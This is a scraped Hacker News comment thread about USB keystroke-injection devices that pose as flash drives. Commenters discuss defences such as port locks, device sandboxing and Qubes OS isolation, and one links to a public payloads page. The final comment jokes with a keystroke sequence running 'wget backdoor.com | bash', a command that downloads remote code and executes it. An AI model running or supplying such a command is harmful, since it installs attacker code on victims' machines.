TE
TechEcho
Home24h TopNewestBestAskShowJobs
GitHubTwitter
Home

TechEcho

A tech news platform built with Next.js, providing global tech news and discussions.

GitHubTwitter

Home

HomeNewestBestAskShowJobs

Resources

HackerNews APIOriginal HackerNewsNext.js

© 2025 TechEcho. All rights reserved.

Thought it was a flash drive [video]

33 pointsby cgtyoderalmost 6 years ago

7 comments

dijitalmost 6 years ago
Hasn&#x27;t this been known for half-a-decade?<p>I mean, it&#x27;s a product you can literally buy and it&#x27;s impossible to adequately defend against.<p><a href="https:&#x2F;&#x2F;github.com&#x2F;hak5darren&#x2F;USB-Rubber-Ducky&#x2F;wiki&#x2F;Payloads" rel="nofollow">https:&#x2F;&#x2F;github.com&#x2F;hak5darren&#x2F;USB-Rubber-Ducky&#x2F;wiki&#x2F;Payloads</a><p><a href="https:&#x2F;&#x2F;shop.hak5.org&#x2F;products&#x2F;usb-rubber-ducky-deluxe" rel="nofollow">https:&#x2F;&#x2F;shop.hak5.org&#x2F;products&#x2F;usb-rubber-ducky-deluxe</a>
评论 #20204540 未加载
codezeroalmost 6 years ago
Jeez, I thought these auto opening usb things were isolated to Windows and only old versions. What’s the story with this on macOS?
评论 #20203553 未加载
评论 #20203507 未加载
评论 #20203541 未加载
_bxg1almost 6 years ago
As has been pointed out, you couldn&#x27;t block this kind of thing without blocking USB keyboards altogether.<p>I wonder what it would look like to have a background program that would detect and intercept any newly connected device by default, give it a fake (VM?) environment, and log everything it tried to do to the screen while prompting to ask if you want to let it into the &quot;real&quot; system. Obviously this is what security professionals do manually, but I&#x27;m talking about a totally transparent and automatic version that could be left running all the time.
评论 #20204323 未加载
评论 #20203617 未加载
评论 #20203599 未加载
评论 #20203644 未加载
评论 #20203592 未加载
fencepostalmost 6 years ago
There are a variety of physical port blockers available as well as devices to lock cables in place. Some protrude, others are flush and require a key for removal.<p>If you have business policies and training in place, hopefully the additional steps of removing a lock will also provide time for adequate second thoughts to percolate through those with poor judgment. Malicious actors won&#x27;t be seriously deterred, but that&#x27;s a different matter.
snailmailmanalmost 6 years ago
Qubes OS has an interesting way of combatting these kinds of attacks. You can manually attach a usb drive to a specific program VM, limiting the damage possible by a malicious flash drive.<p>I want to say it even lets you disable or whitelist usb keyboards&#x2F;mice entirely but I’m not 100% certain.<p>QubesOS is pretty different from other OSes though, I wish those sorts of device isolation were possible or more easily accomplished in other operating systems.
NikolaeVariusalmost 6 years ago
At Defcon, a buddy of mine screwed around with a bluetooth HID device, that when connected to, would automatically attempt to open a webpage and send them to an innocuous site (Which obviously could have been a less innocuous site).<p>Couldn&#x27;t believe we got multiple people to connect to it under the guise the device would do a cool thing.
评论 #20204060 未加载
fouronnes3almost 6 years ago
so... &lt;Super&gt;terminal&lt;Enter&gt;wget backdoor.com | bash&lt;Enter&gt;